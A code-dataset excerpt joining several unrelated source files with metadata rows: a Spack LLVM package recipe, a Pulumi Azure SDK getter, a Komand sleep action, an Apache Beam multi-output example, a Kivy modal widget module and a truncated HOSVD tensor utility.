# https://github.com/spack/spack/issues/19908
# merged in llvm main prior to 12.0.0
patch("llvm_python_path.patch", when="@11.0.0")
# The functions and attributes below implement external package
# detection for LLVM. See:
#
# https://spack.readthedocs.io/en/latest/packaging_guide.html#making-a-package-discoverable-with-spack-external-find
executables = ['clang', 'flang', 'ld.lld', 'lldb']
@classmethod
def filter_detected_exes(cls, prefix, exes_in_prefix):
result = []
for exe in exes_in_prefix:
# Executables like lldb-vscode-X are daemon listening
# on some port and would hang Spack during detection.
# clang-cl and clang-cpp are dev tools that we don't
# need to test
if any(x in exe for x in ('vscode', 'cpp', '-cl', '-gpu')):
continue
result.append(exe)
return result
@classmethod
def determine_version(cls, exe):
version_regex = re.compile(
# Normal clang compiler versions are left as-is
r'clang version ([^ )\n]+)-svn[~.\w\d-]*|'
# Don't include hyphenated patch numbers in the version
# (see https://github.com/spack/spack/pull/14365 for details)
r'clang version ([^ )\n]+?)-[~.\w\d-]*|'
r'clang version ([^ )\n]+)|'
# LLDB
r'lldb version ([^ )\n]+)|'
# LLD
r'LLD ([^ )\n]+) \(compatible with GNU linkers\)'
)
try:
compiler = Executable(exe)
output = compiler('--version', output=str, error=str)
if 'Apple' in output:
return None
match = version_regex.search(output)
if match:
return match.group(match.lastindex)
except spack.util.executable.ProcessError:
pass
except Exception as e:
tty.debug(e)
return None
@classmethod
def determine_variants(cls, exes, version_str):
variants, compilers = ['+clang'], {}
lld_found, lldb_found = False, False
for exe in exes:
if 'clang++' in exe:
compilers['cxx'] = exe
elif 'clang' in exe:
compilers['c'] = exe
elif 'flang' in exe:
variants.append('+flang')
compiler['fc'] = exe
compilers['f77'] = exe
elif 'ld.lld' in exe:
lld_found = True
compilers['ld'] = exe
elif 'lldb' in exe:
lldb_found = True
compilers['lldb'] = exe
variants.append('+lld' if lld_found else '~lld')
variants.append('+lldb' if lldb_found else '~lldb')
return ''.join(variants), {'compilers': compilers}
@classmethod
def validate_detected_spec(cls, spec, extra_attributes):
# For LLVM 'compilers' is a mandatory attribute
msg = ('the extra attribute "compilers" must be set for '
'the detected spec "{0}"'.format(spec))
assert 'compilers' in extra_attributes, msg
compilers = extra_attributes['compilers']
for key in ('c', 'cxx'):
msg = '{0} compiler not found for {1}'
assert key in compilers, msg.format(key, spec)
@property
def cc(self):
msg = "cannot retrieve C compiler [spec is not concrete]"
assert self.spec.concrete, msg
if self.spec.external:
return self.spec.extra_attributes['compilers'].get('c', None)
result = None
if '+clang' in self.spec:
result = os.path.join(self.spec.prefix.bin, 'clang')
return result
@property
def cxx(self):
msg = "cannot retrieve C++ compiler [spec is not concrete]"
assert self.spec.concrete, msg
if self.spec.external:
return self.spec.extra_attributes['compilers'].get('cxx', None)
result = None
if '+clang' in self.spec:
result = os.path.join(self.spec.prefix.bin, 'clang++')
return result
@property
def fc(self):
msg = "cannot retrieve Fortran compiler [spec is not concrete]"
assert self.spec.concrete, msg
if self.spec.external:
return self.spec.extra_attributes['compilers'].get('fc', None)
result = None
if '+flang' in self.spec:
result = os.path.join(self.spec.prefix.bin, 'flang')
return result
@property
def f77(self):
msg = "cannot retrieve Fortran 77 compiler [spec is not concrete]"
assert self.spec.concrete, msg
if self.spec.external:
return self.spec.extra_attributes['compilers'].get('f77', None)
result = None
if '+flang' in self.spec:
result = os.path.join(self.spec.prefix.bin, 'flang')
return result
@run_before('cmake')
def codesign_check(self):
if self.spec.satisfies("+code_signing"):
codesign = which('codesign')
mkdir('tmp')
llvm_check_file = join_path('tmp', 'llvm_check')
copy('/usr/bin/false', llvm_check_file)
try:
codesign('-f', '-s', 'lldb_codesign', '--dryrun',
llvm_check_file)
except ProcessError:
# Newer LLVM versions have a simple script that sets up
# automatically when run with sudo priviliges
setup = Executable("./lldb/scripts/macos-setup-codesign.sh")
try:
setup()
except Exception:
raise RuntimeError(
'spack was unable to either find or set up'
'code-signing on your system. Please refer to'
'https://lldb.llvm.org/resources/build.html#'
'code-signing-on-macos for details on how to'
'create this identity.'
)
def setup_build_environment(self, env):
env.append_flags("CXXFLAGS", self.compiler.cxx11_flag)
def setup_run_environment(self, env):
if "+clang" in self.spec:
env.set("CC", join_path(self.spec.prefix.bin, "clang"))
env.set("CXX", join_path(self.spec.prefix.bin, "clang++"))
if "+flang" in self.spec:
env.set("FC", join_path(self.spec.prefix.bin, "flang"))
env.set("F77", join_path(self.spec.prefix.bin, "flang"))
root_cmakelists_dir = "llvm"
def cmake_args(self):
spec = self.spec
python = spec['python']
cmake_args = [
"-DLLVM_REQUIRES_RTTI:BOOL=ON",
"-DLLVM_ENABLE_RTTI:BOOL=ON",
"-DLLVM_ENABLE_EH:BOOL=ON",
"-DCLANG_DEFAULT_OPENMP_RUNTIME:STRING=libomp",
"-DPYTHON_EXECUTABLE:PATH={0}".format(python.command.path),
"-DLIBOMP_USE_HWLOC:BOOL=ON",
"-DLIBOMP_HWLOC_INSTALL_DIR={0}".format(spec["hwloc"].prefix),
]
if python.version >= Version("3.0.0"):
cmake_args.append("-DPython3_EXECUTABLE={0}".format(
python.command.path))
else:
cmake_args.append("-DPython2_EXECUTABLE={0}".format(
python.command.path))
projects = []
if "+cuda" in spec:
cmake_args.extend(
[
"-DCUDA_TOOLKIT_ROOT_DIR:PATH=" + spec["cuda"].prefix,
"-DLIBOMPTARGET_NVPTX_COMPUTE_CAPABILITIES={0}".format(
",".join(spec.variants["cuda_arch"].value)
),
"-DCLANG_OPENMP_NVPTX_DEFAULT_ARCH=sm_{0}".format(
spec.variants["cuda_arch"].value[-1]
),
]
)
else:
# still build libomptarget but disable cuda
cmake_args.extend(
[
"-DCUDA_TOOLKIT_ROOT_DIR:PATH=IGNORE",
"-DCUDA_SDK_ROOT_DIR:PATH=IGNORE",
"-DCUDA_NVCC_EXECUTABLE:FILEPATH=IGNORE",
"-DLIBOMPTARGET_DEP_CUDA_DRIVER_LIBRARIES:STRING=IGNORE",
]
)
if "+omp_debug" in spec:
cmake_args.append("-DLIBOMPTARGET_ENABLE_DEBUG:Bool=ON")
if "+python" in spec and "+lldb" in spec:
cmake_args.append("-DLLDB_USE_SYSTEM_SIX:Bool=TRUE")
if "+lldb" in spec and spec.satisfies("@10.0.0:,doe"):
cmake_args.append("-DLLDB_ENABLE_PYTHON:Bool={0}".format(
'ON' if '+python' in spec else 'OFF'))
if "+lldb" in spec and spec.satisfies("@:9.9.9"):
cmake_args.append("-DLLDB_DISABLE_PYTHON:Bool={0}".format(
'ON' if '~python' in spec else 'OFF'))
if "+gold" in spec:
cmake_args.append(
"-DLLVM_BINUTILS_INCDIR=" + spec["binutils"].prefix.include
)
if "+clang" in spec:
projects.append("clang")
projects.append("clang-tools-extra")
projects.append("openmp")
if "+flang" in spec:
projects.append("flang")
if "+lldb" in spec:
projects.append("lldb")
if "+lld" in spec:
projects.append("lld")
if "+compiler-rt" in spec:
projects.append("compiler-rt")
if "+libcxx" in spec:
projects.append("libcxx")
projects.append("libcxxabi")
cmake_args.append("-DCLANG_DEFAULT_CXX_STDLIB=libc++")
if "+mlir" in spec:
projects.append("mlir")
if "+internal_unwind" in spec:
projects.append("libunwind")
if "+polly" in spec:
projects.append("polly")
cmake_args.append("-DLINK_POLLY_INTO_TOOLS:Bool=ON")
if "+shared_libs" in spec:
cmake_args.append("-DBUILD_SHARED_LIBS:Bool=ON")
if "+llvm_dylib" in spec:
cmake_args.append("-DLLVM_BUILD_LLVM_DYLIB:Bool=ON")
if "+omp_debug" in spec:
cmake_args.append("-DLIBOMPTARGET_ENABLE_DEBUG:Bool=ON")
if "+split_dwarf" in spec:
cmake_args.append("-DLLVM_USE_SPLIT_DWARF:Bool=ON")
if "+all_targets" not in spec: # all is default on cmake
targets = ["NVPTX", "AMDGPU"]
if spec.target.family == "x86" or spec.target.family == "x86_64":
targets.append("X86")
elif spec.target.family == "arm":
targets.append("ARM")
elif spec.target.family == "aarch64":
targets.append("AArch64")
elif (
spec.target.family == "sparc"
or spec.target.family == "sparc64"
):
targets.append("Sparc")
elif (
spec.target.family == "ppc64"
or spec.target.family == "ppc64le"
or spec.target.family == "ppc"
or spec.target.family == "ppcle"
):
targets.append("PowerPC")
cmake_args.append(
"-DLLVM_TARGETS_TO_BUILD:STRING=" + ";".join(targets)
)
if "+omp_tsan" in spec:
cmake_args.append("-DLIBOMP_TSAN_SUPPORT=ON")
if spec.satisfies("@bolt"):
projects.remove("openmp")
projects.append("bolt")
cmake_args.append("-DLIBOMP_USE_BOLT_DEFAULT=ON")
if "+argobots" in spec and spec.satisfies("@bolt"):
cmake_args.append("-DLIBOMP_USE_ARGOBOTS=ON")
if self.compiler.name == "gcc":
gcc_prefix = ancestor(self.compiler.cc, 2)
cmake_args.append("-DGCC_INSTALL_PREFIX=" + gcc_prefix)
if spec.satisfies("platform=cray") or spec.satisfies("platform=linux"):
cmake_args.append("-DCMAKE_BUILD_WITH_INSTALL_RPATH=1")
if self.spec.satisfies("~code_signing platform=darwin"):
cmake_args.append('-DLLDB_USE_SYSTEM_DEBUGSERVER=ON')
# Semicolon seperated list of projects to enable
cmake_args.append(
"-DLLVM_ENABLE_PROJECTS:STRING={0}".format(";".join(projects))
)
return cmake_args
@run_before("build")
def pre_install(self):
with working_dir(self.build_directory):
# When building shared libraries these need to be installed first
make("install-LLVMTableGen")
make("install-LLVMDemangle")
make("install-LLVMSupport")
@run_after("install")
def post_install(self):
spec = self.spec
# unnecessary if we get bootstrap builds in here
if "+cuda" in self.spec:
ompdir = "build-bootstrapped-omp"
# rebuild libomptarget to get bytecode runtime library files
with working_dir(ompdir, create=True):
cmake_args = [
self.stage.source_path + "/openmp",
"-DCMAKE_C_COMPILER:PATH={0}".format(
spec.prefix.bin + "/clang"
),
"-DCMAKE_CXX_COMPILER:PATH={0}".format(
spec.prefix.bin + "/clang++"
),
"-DCMAKE_INSTALL_PREFIX:PATH={0}".format(spec.prefix),
]
cmake_args.extend(self.cmake_args())
cmake_args.append(
"-DLIBOMPTARGET_NVPTX_ENABLE_BCLIB:BOOL=TRUE"
)
# work around bad libelf detection in libomptarget
cmake_args.append(
"-DLIBOMPTARGET_DEP_LIBELF_INCLUDE_DIR:String={0}".format(
spec["libelf"].prefix.include
)
)
cmake(*cmake_args)
make()
make("install")
if "+python" in self.spec:
install_tree("llvm/bindings/python", site_packages_dir)
if "+clang" in self.spec:
install_tree("clang/bindings/python", site_packages_dir)
with working_dir(self.build_directory):
install_tree("bin", join_path(self.prefix, "libexec", "llvm"))
| 36.318505
| 120
| 0.571261
|
2cc826d445f4791051e41c58f178f84cc8bfc30b
| 189
|
py
|
Python
|
fmriprep/data/__init__.py
|
hstojic/fmriprep
|
c92bf833fecf645a2fbf3943486c665a9ebc54f7
|
[
"BSD-3-Clause"
] | 36
|
2019-04-07T18:53:15.000Z
|
2021-04-04T10:35:54.000Z
|
fmriprep/data/__init__.py
|
hstojic/fmriprep
|
c92bf833fecf645a2fbf3943486c665a9ebc54f7
|
[
"BSD-3-Clause"
] | 178
|
2019-02-27T16:36:06.000Z
|
2021-04-06T12:48:38.000Z
|
fmriprep/data/__init__.py
|
hstojic/fmriprep
|
c92bf833fecf645a2fbf3943486c665a9ebc54f7
|
[
"BSD-3-Clause"
] | 20
|
2019-04-05T19:17:26.000Z
|
2021-03-25T14:47:32.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-
# vi: set ft=python sts=4 ts=4 sw=4 et:
""" Data fetchers module """
| 31.5
| 73
| 0.608466
|
985cf9dd32260537971ea0cfa769ceaafdd3fb93
| 4,521
|
py
|
Python
|
sdk/python/pulumi_azure_native/network/v20180101/get_network_watcher.py
|
pulumi-bot/pulumi-azure-native
|
f7b9490b5211544318e455e5cceafe47b628e12c
|
[
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_azure_native/network/v20180101/get_network_watcher.py
|
pulumi-bot/pulumi-azure-native
|
f7b9490b5211544318e455e5cceafe47b628e12c
|
[
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_azure_native/network/v20180101/get_network_watcher.py
|
pulumi-bot/pulumi-azure-native
|
f7b9490b5211544318e455e5cceafe47b628e12c
|
[
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union
from ... import _utilities, _tables
__all__ = [
'GetNetworkWatcherResult',
'AwaitableGetNetworkWatcherResult',
'get_network_watcher',
]
@pulumi.output_type
class GetNetworkWatcherResult:
"""
Network watcher in a resource group.
"""
def __init__(__self__, etag=None, id=None, location=None, name=None, provisioning_state=None, tags=None, type=None):
if etag and not isinstance(etag, str):
raise TypeError("Expected argument 'etag' to be a str")
pulumi.set(__self__, "etag", etag)
if id and not isinstance(id, str):
raise TypeError("Expected argument 'id' to be a str")
pulumi.set(__self__, "id", id)
if location and not isinstance(location, str):
raise TypeError("Expected argument 'location' to be a str")
pulumi.set(__self__, "location", location)
if name and not isinstance(name, str):
raise TypeError("Expected argument 'name' to be a str")
pulumi.set(__self__, "name", name)
if provisioning_state and not isinstance(provisioning_state, str):
raise TypeError("Expected argument 'provisioning_state' to be a str")
pulumi.set(__self__, "provisioning_state", provisioning_state)
if tags and not isinstance(tags, dict):
raise TypeError("Expected argument 'tags' to be a dict")
pulumi.set(__self__, "tags", tags)
if type and not isinstance(type, str):
raise TypeError("Expected argument 'type' to be a str")
pulumi.set(__self__, "type", type)
@property
@pulumi.getter
def etag(self) -> Optional[str]:
return pulumi.get(self, "etag")
@property
@pulumi.getter
def id(self) -> str:
"""
Resource ID.
"""
return pulumi.get(self, "id")
@property
@pulumi.getter
def location(self) -> str:
"""
Resource location.
"""
return pulumi.get(self, "location")
@property
@pulumi.getter
def name(self) -> str:
"""
Resource name.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="provisioningState")
def provisioning_state(self) -> str:
"""
The provisioning state of the resource.
"""
return pulumi.get(self, "provisioning_state")
@property
@pulumi.getter
def tags(self) -> Optional[Mapping[str, str]]:
"""
Resource tags.
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter
def type(self) -> str:
"""
Resource type.
"""
return pulumi.get(self, "type")
class AwaitableGetNetworkWatcherResult(GetNetworkWatcherResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return GetNetworkWatcherResult(
etag=self.etag,
id=self.id,
location=self.location,
name=self.name,
provisioning_state=self.provisioning_state,
tags=self.tags,
type=self.type)
def get_network_watcher(network_watcher_name: Optional[str] = None,
resource_group_name: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetNetworkWatcherResult:
"""
Network watcher in a resource group.
:param str network_watcher_name: The name of the network watcher.
:param str resource_group_name: The name of the resource group.
"""
__args__ = dict()
__args__['networkWatcherName'] = network_watcher_name
__args__['resourceGroupName'] = resource_group_name
if opts is None:
opts = pulumi.InvokeOptions()
if opts.version is None:
opts.version = _utilities.get_version()
__ret__ = pulumi.runtime.invoke('azure-native:network/v20180101:getNetworkWatcher', __args__, opts=opts, typ=GetNetworkWatcherResult).value
return AwaitableGetNetworkWatcherResult(
etag=__ret__.etag,
id=__ret__.id,
location=__ret__.location,
name=__ret__.name,
provisioning_state=__ret__.provisioning_state,
tags=__ret__.tags,
type=__ret__.type)
| 32.06383
| 143
| 0.63017
|
94c687b16303c76f881119ee92688a85081714b2
| 548
|
py
|
Python
|
sleep/komand_sleep/actions/sleep/action.py
|
emartin-merrill-r7/insightconnect-plugins
|
a589745dbcc9f01d3e601431e77ab7221a84c117
|
[
"MIT"
] | null | null | null |
sleep/komand_sleep/actions/sleep/action.py
|
emartin-merrill-r7/insightconnect-plugins
|
a589745dbcc9f01d3e601431e77ab7221a84c117
|
[
"MIT"
] | null | null | null |
sleep/komand_sleep/actions/sleep/action.py
|
emartin-merrill-r7/insightconnect-plugins
|
a589745dbcc9f01d3e601431e77ab7221a84c117
|
[
"MIT"
] | null | null | null |
import komand
import time
from .schema import SleepInput, SleepOutput
class Sleep(komand.Action):
def __init__(self):
super(self.__class__, self).__init__(
name='sleep',
description='Suspend execution for an interval of time',
input=SleepInput(),
output=SleepOutput())
def run(self, params={}):
_time = params.get('interval')
time.sleep(_time)
return { 'slept': _time }
def test(self):
"""TODO: Test action"""
return {}
| 24.909091
| 72
| 0.569343
|
7896027dd412ab6f75451c615bb3df46cb7d3b43
| 6,986
|
py
|
Python
|
sdks/python/apache_beam/examples/cookbook/multiple_output_pardo.py
|
dexterchan/beam
|
01e500c2dd0d699aea0434154b69fd59d824700f
|
[
"Apache-2.0"
] | 2
|
2019-12-14T04:24:33.000Z
|
2020-02-21T07:17:40.000Z
|
sdks/python/apache_beam/examples/cookbook/multiple_output_pardo.py
|
dexterchan/beam
|
01e500c2dd0d699aea0434154b69fd59d824700f
|
[
"Apache-2.0"
] | 14
|
2020-02-12T22:20:41.000Z
|
2021-11-09T19:41:23.000Z
|
sdks/python/apache_beam/examples/cookbook/multiple_output_pardo.py
|
dexterchan/beam
|
01e500c2dd0d699aea0434154b69fd59d824700f
|
[
"Apache-2.0"
] | 1
|
2020-02-09T02:51:50.000Z
|
2020-02-09T02:51:50.000Z
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""A workflow demonstrating a DoFn with multiple outputs.
DoFns may produce multiple outputs. Outputs that are not the default ("main")
output are marked with a tag at output time and later the same tag will be used
to get the corresponding result (a PCollection) for that output.
This is a slightly modified version of the basic wordcount example. In this
example words are divided into 2 buckets as shorts words (3 characters in length
or less) and words (all other words). There will be 3 output files:::
[OUTPUT]-chars : Character count for the input.
[OUTPUT]-short-words : Word count for short words only.
[OUTPUT]-words : Word count for all other words.
To execute this pipeline locally, specify a local output file or output prefix
on GCS:::
--output [YOUR_LOCAL_FILE | gs://YOUR_OUTPUT_PREFIX]
To execute this pipeline using the Google Cloud Dataflow service, specify
pipeline configuration:::
--project YOUR_PROJECT_ID
--staging_location gs://YOUR_STAGING_DIRECTORY
--temp_location gs://YOUR_TEMP_DIRECTORY
--job_name YOUR_JOB_NAME
--runner DataflowRunner
and an output prefix on GCS:::
--output gs://YOUR_OUTPUT_PREFIX
"""
from __future__ import absolute_import
import argparse
import logging
import re
import apache_beam as beam
from apache_beam import pvalue
from apache_beam.io import ReadFromText
from apache_beam.io import WriteToText
from apache_beam.options.pipeline_options import PipelineOptions
from apache_beam.options.pipeline_options import SetupOptions
class SplitLinesToWordsFn(beam.DoFn):
"""A transform to split a line of text into individual words.
This transform will have 3 outputs:
- main output: all words that are longer than 3 characters.
- short words output: all other words.
- character count output: Number of characters in each processed line.
"""
# These tags will be used to tag the outputs of this DoFn.
OUTPUT_TAG_SHORT_WORDS = 'tag_short_words'
OUTPUT_TAG_CHARACTER_COUNT = 'tag_character_count'
def process(self, element):
"""Receives a single element (a line) and produces words and character
counts.
Important things to note here:
- For a single element you may produce multiple main outputs:
words of a single line.
- For that same input you may produce multiple outputs, potentially
across multiple PCollections
- Outputs may have different types (count) or may share the same type
(words) as with the main output.
Args:
element: processing element.
Yields:
words as main output, short words as tagged output, line character count
as tagged output.
"""
# yield a count (integer) to the OUTPUT_TAG_CHARACTER_COUNT tagged
# collection.
yield pvalue.TaggedOutput(
self.OUTPUT_TAG_CHARACTER_COUNT, len(element))
words = re.findall(r'[A-Za-z\']+', element)
for word in words:
if len(word) <= 3:
# yield word as an output to the OUTPUT_TAG_SHORT_WORDS tagged
# collection.
yield pvalue.TaggedOutput(self.OUTPUT_TAG_SHORT_WORDS, word)
else:
# yield word to add it to the main collection.
yield word
class CountWords(beam.PTransform):
"""A transform to count the occurrences of each word.
A PTransform that converts a PCollection containing words into a PCollection
of "word: count" strings.
"""
def expand(self, pcoll):
def count_ones(word_ones):
(word, ones) = word_ones
return (word, sum(ones))
def format_result(word_count):
(word, count) = word_count
return '%s: %s' % (word, count)
return (pcoll
| 'pair_with_one' >> beam.Map(lambda x: (x, 1))
| 'group' >> beam.GroupByKey()
| 'count' >> beam.Map(count_ones)
| 'format' >> beam.Map(format_result))
def run(argv=None, save_main_session=True):
"""Runs the workflow counting the long words and short words separately."""
parser = argparse.ArgumentParser()
parser.add_argument('--input',
default='gs://dataflow-samples/shakespeare/kinglear.txt',
help='Input file to process.')
parser.add_argument('--output',
required=True,
help='Output prefix for files to write results to.')
known_args, pipeline_args = parser.parse_known_args(argv)
# We use the save_main_session option because one or more DoFn's in this
# workflow rely on global context (e.g., a module imported at module level).
pipeline_options = PipelineOptions(pipeline_args)
pipeline_options.view_as(SetupOptions).save_main_session = save_main_session
with beam.Pipeline(options=pipeline_options) as p:
lines = p | ReadFromText(known_args.input)
# with_outputs allows accessing the explicitly tagged outputs of a DoFn.
split_lines_result = (lines
| beam.ParDo(SplitLinesToWordsFn()).with_outputs(
SplitLinesToWordsFn.OUTPUT_TAG_SHORT_WORDS,
SplitLinesToWordsFn.OUTPUT_TAG_CHARACTER_COUNT,
main='words'))
# split_lines_result is an object of type DoOutputsTuple. It supports
# accessing result in alternative ways.
words, _, _ = split_lines_result
short_words = split_lines_result[
SplitLinesToWordsFn.OUTPUT_TAG_SHORT_WORDS]
character_count = split_lines_result.tag_character_count
# pylint: disable=expression-not-assigned
(character_count
| 'pair_with_key' >> beam.Map(lambda x: ('chars_temp_key', x))
| beam.GroupByKey()
| 'count chars' >> beam.Map(lambda char_counts: sum(char_counts[1]))
| 'write chars' >> WriteToText(known_args.output + '-chars'))
# pylint: disable=expression-not-assigned
(short_words
| 'count short words' >> CountWords()
| 'write short words' >> WriteToText(
known_args.output + '-short-words'))
# pylint: disable=expression-not-assigned
(words
| 'count words' >> CountWords()
| 'write words' >> WriteToText(known_args.output + '-words'))
if __name__ == '__main__':
logging.getLogger().setLevel(logging.INFO)
run()
| 36.385417
| 80
| 0.703979
|
307d685d2df6b51fa52c6f7deb5b17d9fd5124ef
| 7,034
|
py
|
Python
|
modals.py
|
devMoxie/MyKivyWidgets
|
5e0ddcef272eb53443e8fb89a02cb3a8cc517548
|
[
"MIT"
] | null | null | null |
modals.py
|
devMoxie/MyKivyWidgets
|
5e0ddcef272eb53443e8fb89a02cb3a8cc517548
|
[
"MIT"
] | null | null | null |
modals.py
|
devMoxie/MyKivyWidgets
|
5e0ddcef272eb53443e8fb89a02cb3a8cc517548
|
[
"MIT"
] | null | null | null |
from kivy.uix.modalview import ModalView
from kivy.uix.popup import Popup
from kivy.uix.label import Label
from kivy.properties import ObjectProperty
from kivy.lang import Builder
from icons.iconfonts import register
from typography import Li
from extend_button_behavior import ExtendedButtonBehavior
"""
modals
======
This module contains classes for 3 different types of modal widgets.
Required Modules
----------------
* `typography`
* `extend_button_behavior`
* `icons`
"""
Builder.load_file('modals.kv')
Builder.load_file('typography.kv')
register('default_font', 'icons/fontawesome-webfont.ttf', 'icons/font-awesome.fontd')
class CloseButton(ExtendedButtonBehavior, Label):
"""This widget uses an icon and to display a button with a hover effect."""
pass
class Dialog(Popup):
"""Defines a modal based on `kivy.uix.popup`.
Features
--------
* A title bar with markup enabled.
* A content container container a variable length of Li widgets.
Attributes
----------
grid : ObjectProperty
This property is defined in `<Dialog>` in `modals.kv`.
title : str
Inherited from `Popup`. Text for the title bar.
Parameters
----------
title : str
Required.
messages : list of str
For each string in `messages` an Li widget is added to `grid`.
Required.
ico : str
Icon name. Optional. Defaults to "fa-circle".
icon_color : str
Optional. Defaults to "20c100".
icon_size : str
Optional. Defaults to "12sp".
"""
def __init__(self,
messages,
title,
ico="fa-circle",
icon_color="20c100",
icon_size="12sp",
*args, **kwargs):
super(Dialog, self).__init__(*args, **kwargs)
self.title = title
self.title_align = 'center'
self.title_size = '18sp'
# Hack: Enable markup on the the title Label.
self.children[0].children[2].markup = True
for msg in messages:
self.grid.add_widget(Li(text=msg,
ico=ico,
icon_color=icon_color,
icon_size=icon_size))
class LoadingModal(ModalView):
"""A modal that displays "loading".
This modal does not have a close button and needs to be closed
programmatically using `kivy.clock.Clock`.
The layout is defing in `modals.kv`.
"""
pass
class ModalBtnClose(ModalView):
"""A modal widget with more custom styles and a close button.
This modal is designed for a single string with an icon.
Attributes
----------
msg : StringProperty
Text to display. Required.
ico : StringProperty
The icon to display. The default icon is 'fa-circle'.
Optional.
icon_color : StringProperty
The color of the icon. The default icon_color is '20c100'.
Optional.
"""
# msg = StringProperty(None)
# ico = StringProperty(None)
# icon_color = StringProperty(None)
def __init__(self, msg, ico="fa-circle", icon_color="20c100", *args, **kwargs):
self.msg = msg
self.ico = ico
self.icon_color = icon_color
super(ModalBtnClose, self).__init__(*args, **kwargs)
class ContentModal(Popup):
"""docstring for ContentModal"""
box = ObjectProperty(None)
modal_content = ObjectProperty(None)
def __init__(self, modal_content=None, title="", *args, **kwargs):
self.modal_content = modal_content
super(ContentModal, self).__init__(*args, **kwargs)
self.box.add_widget(self.modal_content)
self.title = title
self.title_align = 'center'
self.title_size = '18sp'
# Hack: Enable markup on the the title Label.
self.children[0].children[2].markup = True
if __name__ == '__main__':
from kivy.app import App
from kivy.uix.anchorlayout import AnchorLayout
from kivy.uix.boxlayout import BoxLayout
from kivy.uix.scrollview import ScrollView
from kivy.uix.gridlayout import GridLayout
from kivy.uix.button import Button
from kivy.clock import Clock
from icons.iconfonts import icon
from typography import P
class RootWidget(AnchorLayout):
def __init__(self, *args, **kwargs):
super(RootWidget, self).__init__(*args, **kwargs)
cont = BoxLayout(orientation='horizontal', size_hint=(None, None), width=1360, height=120)
btn1 = Button(text="Open Dialog", size_hint=(None, None), size=(340, 120))
btn1.bind(on_release=self.open_dialog)
btn2 = Button(text="Open LoadingModal", size_hint=(None, None), size=(340, 120))
btn2.bind(on_release=self.open_loading_modal)
btn3 = Button(text="Open ModalBtnClose", size_hint=(None, None), size=(340, 120))
btn3.bind(on_release=self.open_modal_btn_close)
btn4 = Button(text="Open ContentModal", size_hint=(None, None), size=(340, 120))
btn4.bind(on_release=self.open_content_modal)
for b in [btn1, btn2, btn3, btn4]:
cont.add_widget(b)
self.add_widget(cont)
def open_dialog(self, *args):
title = u"{} [b]Dialog Title[/b]".format(icon("fa-th-list", "18sp", "4d8cf5"))
msgs = ["This is message {}.".format(i) for i in range(10)]
d = Dialog(title=title,
messages=msgs,
ico="fa-angle-right",
icon_size="16sp")
d.open()
def open_loading_modal(self, *args):
mod = LoadingModal()
mod.open()
Clock.schedule_once(lambda dt: mod.dismiss(), 2)
def open_modal_btn_close(self, *args):
mod = ModalBtnClose(msg="Are you sure you made the right move?",
ico="fa-warning",
icon_color="ff2222")
mod.open()
def open_content_modal(self, *args):
t1 = "This also leads to some other annoying behaviour - as well as the text not wrapping, you might have observed that the halign and valign properties seem to do nothing by default."
sv = ScrollView()
grid = GridLayout(cols=1, size_hint_y=None)
grid.bind(minimum_height=grid.setter('height'))
for i in range(20):
grid.add_widget(P(text=t1))
sv.add_widget(grid)
title = u"{} Content Modal".format(icon("fa-bell-o", "18sp", "4d8cf5"))
mod = ContentModal(modal_content=sv, title=title)
mod.open()
class TestApp(App):
def build(self):
return RootWidget()
TestApp().run()
| 29.679325
| 196
| 0.586011
|
740d6f2954d1ca11471964a4e8de98cc030ef4ea
| 5,715
|
py
|
Python
|
utils/tensor_old.py
|
pengyuan/markov2tensor
|
4bcdcba6273dc7b671d81953da934188135dbca3
|
[
"MIT"
] | 1
|
2018-03-20T08:28:25.000Z
|
2018-03-20T08:28:25.000Z
|
utils/tensor_old.py
|
pengyuan/markov2tensor
|
4bcdcba6273dc7b671d81953da934188135dbca3
|
[
"MIT"
] | null | null | null |
utils/tensor_old.py
|
pengyuan/markov2tensor
|
4bcdcba6273dc7b671d81953da934188135dbca3
|
[
"MIT"
] | 2
|
2015-12-16T07:21:15.000Z
|
2018-03-20T08:28:27.000Z
|
#!/usr/bin/env python
# coding: UTF-8
from numpy.linalg import LinAlgError
from scipy.linalg import svd, pinv
import numpy as np
def flatten(T, n):
"""D = FLATTEN(T, N) makes a matrix out of a tensor.
Such that the fibers along dimension N are aligned along the
columms of D.
SYNOPSIS:
T - a tensor
N - The mode in which to flatten T into.
AUTHOR Larsson Omberg lom@larssono.com
DATE 05-June-2009"""
n=n-1
if n>T.ndim | n<=0:
raise ValueError('n has to be between 1 and the number of dimensions of T')
order=[n,]
order.extend(range(n+1, T.ndim))
order.extend(range(0,n))
nrows=T.shape[n]
ncols=np.prod(T.shape)/nrows
return np.reshape(np.transpose(T, order),(nrows,ncols), order='FORTRAN')
def hosvd2(T, saveSpace=False):
"""HOSVD N-mode SVD decomposition of N-way tensor
(Z, Un, Sn, Vn) = HOSVD(T) decomposes the N-way tensor D into N
orthogonal matrices stored in Un and a core tensor Z. Also
returns the n Tucker1 results in Sn and Vn if saveSpace=False (default)
Author: Larsson Omberg <lom@larssono.com>
Date: 11-NOV-2007, 28-February-2008, 5-June-2009, 4-Nov-2010"""
#Find orthogonal matrices
Un=[]; Vn=[]; Sn=[]
for n in range(T.ndim):
Tn = flatten(T, n+1); #FIX
if Tn.shape[1] < Tn.shape[0]:
[U,S,V] = svd(Tn,0);
V=V.T
else:
[V,S,U] = svd(Tn.T,0);
U=U.T
Un.append(U);
if not saveSpace:
